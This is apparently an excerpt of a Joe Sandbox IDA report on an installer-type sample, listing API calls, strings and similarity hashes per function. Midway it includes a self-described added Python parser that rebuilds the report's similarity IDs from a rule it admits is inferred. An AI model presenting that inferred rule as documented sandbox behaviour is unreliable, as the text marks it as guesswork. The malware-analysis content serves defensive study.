                                                                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":
                                                                                                          • API String ID: 589700163-165019052
                                                                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID: $@rD
                                                                                                          • API String ID: 3748168415-881980237
                                                                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcatwsprintf
                                                                                                          • String ID: %02x%c$...
                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                          APIs
                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1599320355-0
                                                                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                          • String ID: Version
                                                                                                          • API String ID: 512980652-315105994
                                                                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
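Each function block above ends with a Similarity section whose API ID and String ID are derived from the APIs and Strings listed in that same block. The following parser is an added example, not part of this report and not Joe Sandbox's own code: it reads the report's "APIs" and "Strings" lines as plain text and rebuilds the two identifiers. The construction rule (split each API name into CamelCase tokens, drop tokens shorter than four characters such as Get, Reg, Ole, DC or the W suffix, group the remaining tokens by how many listed calls contain them, join the groups with "$" from most to least frequent, and sort each group in ASCII order; sort the strings and join them with "$") is inferred by matching the IDs printed in this section, so the 4-character cutoff and the grouping order are assumptions rather than documented behaviour. The numeric "API String ID" pair is not reproduced here. The sample inputs are copied from the IsWindowVisible and RegDeleteValueW blocks above.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" lines of one function block from this
# report (the IsWindowVisible / CallWindowProcW function), pasted as text.
SAMPLE_API_LINES = """\
• IsWindowVisible.USER32(?), ref: 00404902
• CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
"""

# Constructed sample input: the "Strings" lines of the RegDeleteValueW block.
SAMPLE_STRING_LINES = r"""
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
• DeleteRegKey: "%s\%s", xrefs: 00402843
"""

# Name.MODULE as printed by the report, with or without an argument list
# (the report prints "lstrlenW.KERNEL32 ref: ..." for some calls).
API_LINE = re.compile(r"(?P<api>[A-Za-z]\w*)\.(?P<module>[A-Z][A-Z0-9]*)\b")
# The literal string is everything between the bullet and ", xrefs: <addr>".
STRING_LINE = re.compile(r"•\s*(?P<s>.*?),\s*xrefs:\s*[0-9A-Fa-f]+")
# CamelCase splitter that keeps acronyms whole: SHFileOperationW -> SH, File, Operation, W.
CAMEL = re.compile(r"[A-Z]+(?=[A-Z][a-z])|[A-Z]?[a-z]+|[A-Z]+|\d+")
# Assumption (inferred from the IDs on this page): tokens shorter than four
# characters (Get, Reg, Ole, Is, DC, the W suffix, ...) are discarded.
MIN_TOKEN = 4


def parse_api_calls(text):
    """Return (api, module) pairs in report order, subcall lines included."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            calls.append((m.group("api"), m.group("module")))
    return calls


def parse_strings(text):
    """Return the literal strings listed under a block's Strings heading."""
    return [m.group("s") for m in (STRING_LINE.search(l) for l in text.splitlines()) if m]


def api_tokens(api_name):
    """CamelCase tokens of one API name, short tokens removed."""
    return [t for t in CAMEL.findall(api_name) if len(t) >= MIN_TOKEN]


def api_id(api_names):
    """Rebuild the Similarity 'API ID': tokens grouped by descending call count,
    groups joined with '$', each group sorted in ASCII order (uppercase first).
    A token is counted once per listed call that contains it."""
    counts = Counter(tok for name in api_names for tok in api_tokens(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def string_id(strings):
    """Rebuild the Similarity 'String ID': the block's strings sorted and joined with '$'."""
    return "$".join(sorted(strings))


def api_id_from_block(text):
    return api_id([api for api, _ in parse_api_calls(text)])


def string_id_from_block(text):
    return string_id(parse_strings(text))


if __name__ == "__main__":
    print(api_id_from_block(SAMPLE_API_LINES))       # Window$CallMessageProcSendVisible
    print(string_id_from_block(SAMPLE_STRING_LINES))
```

Because the IDs depend only on the API names and strings, two functions with different addresses and different fuzzy hashes but the same API ID and String ID can be matched across reports, which is what the Similarity section is for; a rebuilt ID that does not match the printed one is a quick sign that the rule above is incomplete for that block.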
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
• GetProcAddress.KERNEL32(?,00000000), ref: 00406395
• GlobalFree.KERNEL32(00000000), ref: 0040639E
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
• Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
